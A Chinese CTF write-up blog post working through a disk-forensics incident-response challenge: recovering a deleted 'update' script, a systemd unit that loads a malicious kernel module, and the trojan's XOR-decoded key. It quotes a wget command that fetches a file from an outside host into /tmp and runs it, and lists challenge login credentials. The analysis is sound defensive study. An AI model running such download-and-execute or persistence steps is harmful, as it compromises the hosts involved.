<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="主要把这次的ISW部分复现一下">
<meta property="og:type" content="article">
<meta property="og:title" content="2025 CISCN &amp; CCB ISW 磁盘取证">
<meta property="og:url" content="http://example.com/2025/03/21/2025%20CISCN%20&%20CCB/index.html">
<meta property="og:site_name" content="F0T1-CTF">
<meta property="og:description" content="主要把这次的ISW部分复现一下">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321171347885.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321172413208.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321173546512.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321174547822.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321174809054.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321175032183.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165334497.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165512788.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165610462.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321170048332.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321180005675.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203107576.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203354599.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203454696.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203621549.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203821283.png">
<meta property="article:published_time" content="2025-03-21T12:44:00.000Z">
<meta property="article:modified_time" content="2025-03-25T11:58:41.118Z">
<meta property="article:author" content="CTF-DUAN">
<meta property="article:tag" content="应急响应">
<meta property="article:tag" content="取证">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321171347885.png">

<link rel="canonical" href="http://example.com/2025/03/21/2025%20CISCN%20&%20CCB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>2025 CISCN & CCB ISW 磁盘取证 | F0T1-CTF</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">F0T1-CTF</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">从0到1CTFer成长之路</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/03/21/2025%20CISCN%20&%20CCB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://cdn.jsdelivr.net/gh/F0T0ne/Image/logo.jpg">
      <meta itemprop="name" content="CTF-DUAN">
      <meta itemprop="description" content="CTF学习">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="F0T1-CTF">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2025 CISCN & CCB ISW 磁盘取证
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-03-21 20:44:00" itemprop="dateCreated datePublished" datetime="2025-03-21T20:44:00+08:00">2025-03-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-03-25 19:58:41" itemprop="dateModified" datetime="2025-03-25T19:58:41+08:00">2025-03-25</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%8F%96%E8%AF%81/" itemprop="url" rel="index"><span itemprop="name">取证</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%8F%96%E8%AF%81/WP/" itemprop="url" rel="index"><span itemprop="name">WP</span></a>
                </span>
            </span>

          
            <div class="post-description">主要把这次的ISW部分复现一下</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="2025-CISCN-CCB-ISW"><a href="#2025-CISCN-CCB-ISW" class="headerlink" title="2025 CISCN &amp; CCB ISW"></a>2025 CISCN &amp; CCB ISW</h1><p><a target="_blank" rel="noopener" href="https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/blog/2025CCB&CISCN-Semis-ISW/#first-of-all">2025 长城杯 &amp; 国赛 半决赛 ISW | Target Machines WriteUp</a></p>
<hr>
<p>大佬博客写的相当详细，先磕一个！！！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">	小路是一名网络安全网管，据反映发现公司主机上有异常外联信息，据回忆前段时间执行过某些更新脚本（已删除），现在需要协助小路同学进行网络安全应急响应分析，查找木马，进一步分析，寻找攻击源头，获取攻击者主机权限获取 flag 文件。</span><br><span class="line"></span><br><span class="line">入口主机请通过 ssh 进行登录，登录口令为：ubuntu/admin_123456，如需 root 权限请使用 sudo；</span><br><span class="line"></span><br><span class="line">第一层解压密码：5e9c5e0370a9c29816b44dfbe2ae5a8d</span><br><span class="line">第二层解压密码：81c7e0d7a82ee016e304fb847c31e497</span><br></pre></td></tr></table></figure>

<p>附件：<a target="_blank" rel="noopener" href="https://github.com/CTF-Archives/2024-CCB-CISCN-Semis/releases/tag/Attachment">https://github.com/CTF-Archives/2024-CCB-CISCN-Semis/releases/tag/Attachment</a></p>
<p>这里就参照大佬博客进行复现</p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>根据题目描述和提供的附件（“入口主机 dd 镜像 .raw”），这是一个<strong>磁盘取证</strong>的场景，而不是内存取证或其他类型。简要分析并区分：</p>
<hr>
<h3 id="磁盘取证"><a href="#磁盘取证" class="headerlink" title="磁盘取证"></a><strong>磁盘取证</strong></h3><ul>
<li><strong>定义</strong>：磁盘取证（Disk Forensics）涉及分析存储介质（如硬盘、SSD）的镜像文件，提取文件系统、日志、删除数据等静态信息。</li>
<li>题目特征<ul>
<li>提供的是 dd 镜像（.raw 格式），这是磁盘的原始字节级副本，包含文件系统、分区表和未分配空间。</li>
<li>任务包括查找木马（文件）、分析更新脚本（可能已删除）、检查服务和日志，这些都依赖磁盘上的静态数据。</li>
</ul>
</li>
<li><strong>工具</strong>：autopsy、sleuthkit、foremost 等，用于解析文件系统和恢复数据。</li>
<li><strong>结论</strong>：这是典型的磁盘取证任务。</li>
</ul>
<hr>
<h3 id="内存取证（对比）"><a href="#内存取证（对比）" class="headerlink" title="内存取证（对比）"></a><strong>内存取证（对比）</strong></h3><ul>
<li><strong>定义</strong>：内存取证（Memory Forensics）分析运行时内存镜像（如 .dmp 文件），提取进程、网络连接、注入代码等动态信息。</li>
<li>特征<ul>
<li>通常提供内存转储文件（例如 Volatility 支持的 .mem 或 .dmp）。</li>
<li>重点在于运行中的进程、内存中的密钥或实时网络活动。</li>
</ul>
</li>
<li>与题目对比<ul>
<li>题目未提供内存镜像，而是磁盘镜像。</li>
<li>未提及运行时状态（如进程列表），而是静态分析（日志、文件）。</li>
</ul>
</li>
<li><strong>结论</strong>：不是内存取证。</li>
</ul>
<hr>
<h3 id="其他类型（排除）"><a href="#其他类型（排除）" class="headerlink" title="其他类型（排除）"></a><strong>其他类型（排除）</strong></h3><ul>
<li><strong>网络取证</strong>：需要 .pcap 文件或实时流量数据，题目未提供。</li>
<li><strong>日志取证</strong>：仅是磁盘取证的一部分（分析 &#x2F;var&#x2F;log），非独立类型。</li>
<li><strong>实时取证</strong>：需要直接访问运行系统，而题目提供的是镜像。</li>
</ul>
<hr>
<h3 id="最终判断"><a href="#最终判断" class="headerlink" title="最终判断"></a><strong>最终判断</strong></h3><ul>
<li><strong>类型</strong>：<strong>磁盘取证</strong>。</li>
<li><strong>理由</strong>：分析对象是 dd 磁盘镜像，任务聚焦于文件系统中的静态数据（如木马文件、服务配置、日志），符合磁盘取证的定义。</li>
</ul>
<p><strong>viminfo 文件</strong>：是 Vim 编辑器的历史记录文件，记录用户的编辑操作、命令和文件路径，通常用于恢复状态，但在安全分析中可作为取证线索。</p>
<h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2><h3 id="First-and-all"><a href="#First-and-all" class="headerlink" title="First and all"></a>First and all</h3><p>分析题目要求：</p>
<ol>
<li>异常外联信息</li>
<li>执行过某些更新脚本（已删除）</li>
<li>查找木马</li>
<li>获取攻击者主机权限获取 flag 文件</li>
</ol>
<p>题目信息提示了很多内容：</p>
<p>​	存在<strong>木马文件</strong>，它如何来的，是<strong>更新脚本</strong>被动手脚了吗</p>
<p>​	它在哪里，回连ip是什么</p>
<p>​	删除的脚本是不是要<strong>恢复</strong>才能知道它是怎么运作运作木马的</p>
<p>使用 <code>R-Studio</code> 进行加载</p>
<p>基本信息：</p>
<p>root目录下没有文件</p>
<p>普通用户Ubuntu存在文件，与ssh连接结果相似</p>
<p>但R-Studio能够将删除的文件进行恢复</p>
<p>存在可疑的文件 1.txt，人为操作的味道太浓了</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321171347885.png" alt="image-20250321171347885"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade &amp;&amp; chmod +x /tmp/.system_upgrade &amp;&amp; /tmp/.system_upgrade</span><br></pre></td></tr></table></figure>

<p>这条shell命令从某个url的&#x2F;f&#x2F;l&#x2F;a&#x2F;g&#x2F;system_upgrade目录下载了名为.system_upgrade的文件，放在tmp目录下</p>
<p>设置权限为可执行，并执行了这个文件，跟flag有关，这么显眼，肯定有用</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321172413208.png" alt="image-20250321172413208"></p>
<p>用户目录下还有一个viminfo 文件</p>
<p><strong>viminfo 文件</strong>：是 Vim 编辑器的历史记录文件，记录用户的编辑操作、命令和文件路径，通常用于恢复状态，但在安全分析中可作为取证线索。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># File marks:</span><br><span class="line"><span class="string">&#x27;0  6  0  /etc/systemd/system/system-upgrade.service</span></span><br><span class="line"><span class="string">|4,48,6,0,1740374317,&quot;/etc/systemd/system/system-upgrade.service&quot;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="number">1</span>  <span class="number">6</span>  <span class="number">0</span>  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|<span class="number">4</span>,<span class="number">49</span>,<span class="number">6</span>,<span class="number">0</span>,<span class="number">1740374161</span>,<span class="string">&quot;/etc/systemd/system/system-upgrade.service&quot;</span></span><br><span class="line"><span class="string">&#x27;2  5  7  /etc/systemd/system/system-upgrade.service</span></span><br><span class="line"><span class="string">|4,50,5,7,1740374151,&quot;/etc/systemd/system/system-upgrade.service&quot;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="number">3</span>  <span class="number">5</span>  <span class="number">7</span>  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|<span class="number">4</span>,<span class="number">51</span>,<span class="number">5</span>,<span class="number">7</span>,<span class="number">1740374151</span>,<span class="string">&quot;/etc/systemd/system/system-upgrade.service&quot;</span></span><br></pre></td></tr></table></figure>

<p>viminfo文件中记录的文件信息显示，**&#x2F;etc&#x2F;systemd&#x2F;system&#x2F;system-upgrade.service**，该文件多次被操作</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321173546512.png" alt="image-20250321173546512"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[Unit]</span><br><span class="line">Description=system-upgrade</span><br><span class="line">After=multi-user.target</span><br><span class="line">[Service]</span><br><span class="line">Type=forking</span><br><span class="line">ExecStart=/sbin/insmod /lib/modules/<span class="number">5.4</span>.<span class="number">0</span><span class="number">-84</span>-generic/kernel/drivers/system/system-upgrade.ko</span><br><span class="line">[Install]</span><br><span class="line">WantedBy=multi-user.target</span><br></pre></td></tr></table></figure>

<p>这个 systemd 服务的作用是：</p>
<ol>
<li><strong>启动时机</strong>：在系统进入多用户模式（multi-user.target）后运行。</li>
<li><strong>执行操作</strong>：使用 &#x2F;sbin&#x2F;insmod 加载内核模块 &#x2F;lib&#x2F;modules&#x2F;5.4.0-84-generic&#x2F;kernel&#x2F;drivers&#x2F;system&#x2F;system-upgrade.ko。</li>
<li><strong>持久化</strong>：通过 WantedBy&#x3D;multi-user.target，服务可以设置为开机自启。</li>
</ol>
<p>这不是持久化攻击的木马程序吗</p>
<p>查找并恢复该文件进行逆向分析</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321174547822.png" alt="image-20250321174547822"></p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321174809054.png" alt="image-20250321174809054"></p>
<h3 id="回环IP"><a href="#回环IP" class="headerlink" title="回环IP"></a>回环IP</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">找出主机上木马回连的主控端服务器 IP 地址（不定时 (3~5 分钟) 周期性），并以 flag&#123;MD5&#125; 形式提交，其中 MD5 加密目标的原始字符串格式 IP:port</span><br></pre></td></tr></table></figure>

<p>跟踪进去就找到ip和端口了</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321175032183.png" alt="image-20250321175032183"></p>
<p>大佬说是使用了检测规避技术，确实函数名也有体现，伪造了ip和端口，也许这就是ip周期性变化的原因吧</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">通过内核模块，攻击者可以直接修改网络堆栈，伪造 IP 地址或端口。</span><br><span class="line"></span><br><span class="line">通过伪装的 systemd 服务，攻击者可以在系统启动时自动运行恶意代码，并利用常见端口（如 80 或 443）掩盖流量。</span><br></pre></td></tr></table></figure>



<h3 id="木马文件"><a href="#木马文件" class="headerlink" title="木马文件"></a>木马文件</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">找出主机上驻留的远控木马文件本体，计算该文件的 MD5, 结果提交形式：flag&#123;md5&#125;</span><br></pre></td></tr></table></figure>

<p>题目要求找到<strong>远控木马文件本体</strong>，在上一个文件中存在另一个文件的位置信息</p>
<p>上一个文件中记录了木马的回环IP等信息，也应该记录木马文件本体的位置</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165334497.png" alt="image-20250321165334497"></p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165512788.png" alt="image-20250321165512788"></p>
<p>进入R-Studio中查找该文件并恢复</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321165610462.png" alt="image-20250321165610462"></p>
<p>在Windows 系统中，可以使用内置的<em>certutil</em>命令行工具来获取文件的MD5值。使用方法如下：</p>
<p>certutil -hashfile &lt;文件路径&gt; MD5</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321170048332.png" alt="image-20250321170048332"></p>
<h3 id="木马加载者"><a href="#木马加载者" class="headerlink" title="木马加载者"></a>木马加载者</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">找出主机上加载远控木马的持久化程序（下载者），其功能为下载并执行远控木马，计算该文件的 MD5, 结果提交形式：flag&#123;MD5&#125;</span><br></pre></td></tr></table></figure>

<p>ko文件中找到了木马文件的信息，应该就是ko文件下载了运控木马，ko文件还能持久化运行，那不妥妥的木马下载者，同理，计算其md5即可</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321180005675.png" alt="image-20250321180005675"></p>
<h3 id="回环"><a href="#回环" class="headerlink" title="回环"></a>回环</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">查找题目 3 中持久化程序（下载者）的植入痕迹，计算持久化程序植入时的原始名称 MD5（仅计算文件名称字符串 MD5），并提交对应 flag&#123;MD5&#125;</span><br></pre></td></tr></table></figure>

<p>结合先前1.txt的内容，加载的文件应该伪装成了ko文件，就是被重命名了，毕竟题目都说了“<strong>原始名称</strong>”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade &amp;&amp; chmod +x /tmp/.system_upgrade &amp;&amp; /tmp/.system_upgrade</span><br></pre></td></tr></table></figure>

<p>原始名称为**.system_upgrade**</p>
<p>将其md5加密flag包裹即可</p>
<h3 id="加密秘钥"><a href="#加密秘钥" class="headerlink" title="加密秘钥"></a>加密秘钥</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">分析题目 2 中找到的远控木马，获取木马通信加密密钥, 结果提交形式：flag&#123;通信加密密钥&#125;</span><br></pre></td></tr></table></figure>

<p>拖到ida首先查看字符串</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203107576.png" alt="image-20250321203107576"></p>
<p>找到&#x2F;proc&#x2F;self&#x2F;exe</p>
<p>&#x2F;proc&#x2F;self&#x2F;exe 在恶意软件中可能有以下用途：</p>
<ul>
<li><strong>自我复制</strong>：木马通过读取 &#x2F;proc&#x2F;self&#x2F;exe，将自身复制到其他目录（例如 &#x2F;tmp），并改名运行，以隐藏身份。</li>
<li><strong>持久化</strong>：将自身写入启动脚本或服务（如 systemd），确保重启后继续运行。</li>
<li><strong>检测规避</strong>：通过检查 &#x2F;proc&#x2F;self&#x2F;exe 的路径，判断自身是否运行在沙箱或调试环境中（例如路径异常时退出）。</li>
<li><strong>动态加载</strong>：木马可能利用 &#x2F;proc&#x2F;self&#x2F;exe 读取自身二进制，提取嵌入的数据（如<strong>加密密钥</strong>）。</li>
</ul>
<p>跟踪进去</p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203354599.png" alt="image-20250321203354599"></p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203454696.png" alt="image-20250321203454696"></p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203621549.png" alt="image-20250321203621549"></p>
<p><img src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/image-20250321203821283.png" alt="image-20250321203821283"></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">en_key=[<span class="number">0x3D</span>, <span class="number">0x01</span>, <span class="number">0x20</span>, <span class="number">0x3A</span>, <span class="number">0x36</span>, <span class="number">0x58</span>, <span class="number">0x3A</span>, <span class="number">0x36</span>, <span class="number">0x1D</span>, <span class="number">0x01</span>, </span><br><span class="line">  <span class="number">0x5A</span>, <span class="number">0x36</span>, <span class="number">0x3A</span>, <span class="number">0x5A</span>, <span class="number">0x0A</span>, <span class="number">0x3B</span>, <span class="number">0x5A</span>, <span class="number">0x1D</span>, <span class="number">0x36</span>, <span class="number">0x0F</span>, </span><br><span class="line">  <span class="number">0x05</span>, <span class="number">0x29</span>, <span class="number">0x0E</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 遍历en_key列表，将每个元素与0x69异或，然后输出对应的字符</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> en_key:</span><br><span class="line">    <span class="built_in">print</span>((<span class="built_in">chr</span>)(i^<span class="number">0x69</span>),end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    </span><br><span class="line"><span class="comment"># ThIS_1S_th3_S3cR3t_fl@g</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="end1"><a href="#end1" class="headerlink" title="end1"></a>end1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">分析题目 3 中持久化程序（下载者），找到攻击者分发远控木马使用的服务器，并获取该服务器权限，找到 flag，结果提交形式：flag&#123;xxxx&#125;</span><br><span class="line">tips：压缩包密码最后一位为.</span><br></pre></td></tr></table></figure>

<h3 id="end2"><a href="#end2" class="headerlink" title="end2"></a>end2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">获取题目 2 中找到的远控木马的主控端服务器权限，查找 flag 文件，结果提交形式：flag&#123;xxxx&#125;</span><br></pre></td></tr></table></figure>

<p>剩余两个题目没有服务器，大佬都没复习，咱就这样吧</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
             <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" <i class="fa fa-tag"></i> 应急响应</a>
             <a href="/tags/%E5%8F%96%E8%AF%81/" <i class="fa fa-tag"></i> 取证</a>
             <a href="/tags/WP/" <i class="fa fa-tag"></i> WP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/03/12/Vue.js%20%E5%BC%80%E5%8F%91%E5%9F%BA%E7%A1%80/" rel="prev" title="Vue.js 开发基础">
      <i class="fa fa-chevron-left"></i> Vue.js 开发基础
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/03/25/PolarCTF-2025-%E5%A4%8D%E7%8E%B0/" rel="next" title="PolarCTF 2025春季赛 & Web">
      PolarCTF 2025春季赛 & Web <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2025-CISCN-CCB-ISW"><span class="nav-number">1.</span> <span class="nav-text">2025 CISCN &amp; CCB ISW</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A3%81%E7%9B%98%E5%8F%96%E8%AF%81"><span class="nav-number">1.1.1.</span> <span class="nav-text">磁盘取证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81%EF%BC%88%E5%AF%B9%E6%AF%94%EF%BC%89"><span class="nav-number">1.1.2.</span> <span class="nav-text">内存取证（对比）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E7%B1%BB%E5%9E%8B%EF%BC%88%E6%8E%92%E9%99%A4%EF%BC%89"><span class="nav-number">1.1.3.</span> <span class="nav-text">其他类型（排除）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" 